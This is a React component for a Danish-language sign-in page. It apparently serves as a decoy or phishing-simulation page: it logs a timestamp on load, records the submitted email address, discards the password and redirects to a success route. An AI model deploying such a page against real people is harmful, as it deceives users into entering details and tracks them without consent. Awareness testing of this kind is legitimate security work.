import React, { useState, useEffect } from 'react';
import './Login.css';
import './App.css';
import logo from './images/logo.png'
import { insertEmail, insertDate } from './apiCommunicator';
import eye from './images/eye.png'
import { useNavigate } from "react-router-dom";


export default function LoginBox() {
    const [showPassword, setShowPassword] = useState(false);

    const navigate = useNavigate();

    useEffect(() => {
        insertDate();
    }, []);

    return (
        <div className="App text">
            <img className='logo' src={logo} alt="Logo" />
            <div className="rectangle log-in-pop-up ">
                <h1 className='log-in-header'>Indtast din <br />
                    adgangskode</h1>

                <form method="post" onSubmit={(e) => handleLogIn(e, navigate)}>
                    <div className='loginForm'>

                        <div className="email input-group">
                            <input
                                className="text"
                                name="email"
                                placeholder=" "
                                required
                            />
                            <label>E-mailadresse</label>
                        </div>

                        <div className="password input-group">
                            <input
                                className="text"
                                name="password"
                                placeholder=" "
                                type={showPassword ? "text" : "password"}
                                required
                            />

                            <label>Adgangskode</label>

                            <img
                                className='eye'
                                src={eye}
                                alt="Eye"
                                onClick={() => setShowPassword(!showPassword)}
                            />
                        </div>
                        <div className='forgot-password-container'>
                            <a className='forgot-password' href="url">
                                Glemt din adgangskode?
                            </a>
                        </div>

                        <button className="pill-button" type="submit">
                            Fortsæt
                        </button>

                    </div>
                </form>

                <div className="footer-links">
                    <a href="url">Vilkår for brug</a>
                    <span>|</span>
                    <a href="url">Privatlivspolitik</a>
                </div>
            </div>
        </div>
    )
}

async function handleLogIn(e: any, navigate: any) {
    e.preventDefault();

    const form = e.target;
    const formData = new FormData(form);

    await insertEmail(formData.get("email") as string);

    navigate("/success");
}